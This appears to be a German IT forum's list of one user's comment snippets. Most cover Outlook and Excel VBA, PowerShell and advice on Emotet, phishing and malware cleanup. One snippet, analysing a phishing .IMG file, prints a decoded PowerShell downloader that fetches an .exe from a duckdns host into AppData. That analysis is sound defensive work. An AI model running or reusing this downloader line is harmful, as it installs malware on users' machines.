HTML Javascript Schadcode?
Created on Mar 23, 2023
Der dritte link wird von Kaspersky als "malicous" eingestuft. https://urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden. ...
12
CommentsHTML Javascript Schadcode?
Created on Mar 22, 2023
Hier nach dem "Beautifier": ...
12
CommentsOutlook Signatur nach Empfänger ändern
Created on Mar 07, 2023
Hallo, einfach gesagt, Outlook nutzt Word als Editor. Für die Signatur gibt es ein Bookmark: mfg ...
3
CommentsAutomatisierung Dateiverwaltung MS-Outlook
Created on Mar 06, 2023
Hallo, es geht mit wenigen Zeilen VBA, es sollte aber Erfahrungen vorhanden sein. Pseudocode: mfg ...
2
CommentsICMP-Datenströme in der Netzwerkaufzeichnung
Created on Dec 19, 2022
Hallo, im gezeigten Logfile oben in der letzten Zeile Die IP-Adresse in Hex (0xD21") könnte auflösen in Ping wird ausgeführt für pcve.dringendkommen.com 210.16.101.132 mit ...
22
CommentsICMP-Datenströme in der Netzwerkaufzeichnung
Created on Dec 19, 2022
Hallo, im ICMP-Protokoll gibt es ein buffer-overflow-error. Erkennbar wird ein Angriff aber nur auf einem detailierteren Level: Sans "Packet Tueday" mfg ...
22
CommentsOutlook - Gesendete Mails als Kopie speichern wiederherstellen
Created on Sep 14, 2022
Hallo, gibt es in der INBOX am unteren Ende des Header eine kleine Information, dass diese EMail beantwortet/weitergeleitet wurde? I.d.R. steht das Datum dabei ...
4
CommentsEmpfangsadresse (Alias) in Outlook einblenden
Created on Jun 03, 2022
Hallo, hilft das? Die betreffende Mail muss ausgewählt sein. mfg ...
5
CommentsOutlook VBA - Jede 10. Mail verschieben
Created on Jun 03, 2022
Ersetze durch wobei "Dein Ziel-Pfad" im Format "\\email-adress\folder-Name" ist ...
4
CommentsOutlook VBA - Jede 10. Mail verschieben
Created on Jun 03, 2022
Hallo, ein Vorschlag (nicht getestet) ...
4
CommentsCobalt Strike
Created on Apr 01, 2022
Meine Idee war aus der genannten Github Datenbank die IP-Addressen der C2-Server auszulesen. Sofern die eigene Firewall die IP-Adressen der ausgehenden Verbindungen zumindesten für ...
7
CommentsCobalt Strike
Created on Mar 31, 2022
Konkret kann ich die Frage nicht beantworten, aber es gab die letzten Monate immer wieder mal Hinweise. Zum Üben werden hier Beispiele zur Verfügung ...
7
CommentsRandom phishing mail erhalten jedoch unterhalb teil von echter mail enthalten
Created on Feb 17, 2022
Hallo, was steht denn in den EMail-Headern? mfg ...
4
CommentsListe von URLs in wininet.dll
Created on Jan 21, 2022
Die Url's stammen bei meinem 32-bit-System aus dem genannten Ordner. Bei 64-bit sollte der Ort sein: C:\Windows\SysWOW64\wininet.dll (ungeprüft) Die Liste von oben stammt aus ...
13
CommentsCSV-Dateien mit unterschiedlichen Headern über ID zusammenfassen
Created on Dec 28, 2021
Hallo, ein möglicher Weg ist, die CSV in jeweils ein Sheet in Excel zu importieren und dann mit "=SVersweis()" zu verknüpfen. mfg ...
5
CommentsOutlook Dateinamen von Anhängen bei Antwort anzeigen
Created on Dec 02, 2021
Für ein von Hand selektiertes Mailitem sollte gehen: <code>Sub iGetConversation_Attachment() Dim EML As MailItem, Conv As Conversation Set EML = ActiveExplorer.Selection(1) Set Conv = ...
2
CommentsOutlook Dateinamen von Anhängen bei Antwort anzeigen
Created on Dec 02, 2021
Ein Diskussionsbeitrag: Über die "ConversationsID" können die vorangegangen Email bestimmt werden und damit auch die Namen der Attachments gelesen werden. Etwas VBA-Kenntnisse sind nötig. ...
2
CommentsMitarbeiter Sensibilisierung durch Fake Datei
Created on Nov 15, 2021
Zwei Ideen: - Canary Token: Die bieten eine Warnnung, falls eine bestimmte Datei geöffnet wird - Word/Excel ohne VBA: Ein Bild einbinden, dass vom ...
23
CommentsFacebook, Instagram und Whats App down
Created on Oct 04, 2021
Noch ein Hinweis auf das BGP: ISC.sans.edu Als Text: https://isc.sans.edu/forums/diary/Facebook+Outage+Yes+its+DNS+sort+of+A+super+quick+analysis+of+what+is+going+on/27900/ ...
101
CommentsSuche eine gute und einfache Anleitung wie man mit Powershell auf eine API Restschnittstelle zugreift
Created on Aug 16, 2021
Hallo, hier ein Beispiel um die aktuelle Zeitabzufragen: <code>$url = ' $ret = invoke-restmethod -Uri $url # irm $ret.datetime</code> Ohne 'datetime' sieht man alle ...
8
CommentsPhishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)
Created on Jul 23, 2021
Es ist Base64: $DecodedText = System.Text.Encoding::Unicode.GetString(System.Convert::FromBase64String($b64)) $DecodedText und ergibt nach Entfernen einiger Tabs: invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe” Fehlt da noch etwas? ...
17
CommentsExcel Wert aus Zelle "einfrieren"
Created on Jun 10, 2021
Hallo, den angezeigten Wert erhält man mit cells(1,1).Text mfg ...
6
CommentsExcel Performance in großen Tabellen optimieren?
Created on May 26, 2021
100.000 Zeilen sollten Excel nicht sonderlich belasten, 10.000 Formeln können das sehr wohl. Algemeine Ideen zur Beschleunigung: - keine ganze Spalten in Formels - ...
6
CommentsSubexpressions in der Powershell
Created on Mar 25, 2021
Danke ...
12
CommentsExchange-Hack (2021-03) war Angriff erfolgreich? Was dann?
Created on Mar 09, 2021
Die Schwachstelle im "ExChange" gab es wohl schon lange (10 Jahre +) und wurde Microsoft am 2. Januar 2021 gemeldet. In den 2 Monaten ...
95
CommentsEiner Malware auf der Spur. Benötige Sherlock Holmes!
Created on Mar 01, 2021
Versuch die DoItYourself-Methode: Prüfe - Autostart - den Ordner %Temp% - den Ordner C:\programdate - die Ordner in c:\users\public - windows kann alle DNS-Queries ...
10
CommentsWord, Excel, PDF Dateien Personalisieren: öffnen, bearbeiten nur auf Firmen PCs
Created on Feb 25, 2021
Hallo, es ist zwar möglich solche Sperren per VBA einzubauen, aber da mit einem Tastendruck VBA beim Öffnen abgeschaltet werden kann, ist es "völlig ...
9
CommentsEXCEL Werte des Tabellenfilter als Liste ausgeben lassen
Created on Feb 11, 2021
Vielleicht geht es, aber ein einfacher Weg ein 'unique' Liste zu erhalten ist der Spezial-Filter. Danach zu sortieren ist kein Problem. ...
3
CommentsEmotet angeblich unschädlich gemacht
Created on Jan 27, 2021
Noch ein paar Details: ...
17
CommentsEmotet durch BKA zerschlagen
Created on Jan 27, 2021
Viele MS-Malware Familien nutzen "WScript.Shell", das aber von vielen Anti-Viren-Programmen geblockt wird. Emotet startet PowerShell aber anderst, das ging vor wenigen Wochen noch durch. ...
3
CommentsEmotet angeblich unschädlich gemacht
Created on Jan 27, 2021
Einen eher ausführlichen Artikel gibt es hier: ...
17
CommentsEmotet angeblich unschädlich gemacht
Created on Jan 27, 2021
Es gibt seit Jahren eine Gruppe, die täglich alle Daten zu Emotet sammelt und veröffentlicht: Auf Twitter gibt es keine Meldung: ...
17
CommentsBATCH: Dateibesitzer mit kopieren
Created on Jan 26, 2021
Hallo, vor kurzem habe ich einen Code gefunden (und nicht getestet), der den Besitzer einer Datei ausgeben soll. Es ist ein VBA-Code. Kannst Du ...
6
CommentsTja, so kanns kommen
Created on Jan 20, 2021
Haben sie Interesse an IT-Security? Da gibt es jeden Tag etwas neues. ...
5
CommentsTXT Datei verschieben wenn Datum drinnen steht
Created on Jan 15, 2021
Der Code sucht das aktuelle Datum in der ersten Zeile: Die folgenden Aktionen müssen noch ergänzt werden, bzw aus den anderen Beiträgen übernommen werden. ...
6
CommentsWAN IPs der ISPs auf Wohnorte getrackt?
Created on Jan 10, 2021
Wenn Du nach "GeoIP" googlest, solltest Du viele Treffer erhalten: Sowohl bei Facebook in den Einstellungen als auch bei "www.weather.com" (F12: Netzwerk) siehst Du, ...
38
CommentsEmailspam mit Zip-Dateien
Created on Jan 08, 2021
Falls Emotet gestartet wurde, wird -vermutlich- eine dll ins $HOME-Directory geschrieben, also c:\users\-eigenerName- Zur Vorsicht sollte auch %temp% und c:\programData geprüft werden. Palawer: Einem ...
24
CommentsEmailspam mit Zip-Dateien
Created on Jan 08, 2021
Ok. Emotet greift die EMail - Kontakte ab und verschickt malware an diese Adressen. Es könnte Sinn machen die Geschäftspartner zu warnen. ...
24
CommentsEmailspam mit Zip-Dateien
Created on Jan 08, 2021
Wenn man den ersten Base64 string dekodiert, gibt es: ?WVs und Sachstandsanfragen machen alle RAe und RAin künftig selbst Macht das Sinn? ...
24
CommentsEmailspam mit Zip-Dateien
Created on Jan 08, 2021
Ja, eindeutig malware: ein Trojaner Da ich kein Konto bei Virustotal habe, kann ich keine weiteren Infos, z.B. die Familie erkennen. Versuche so gut ...
24
Comments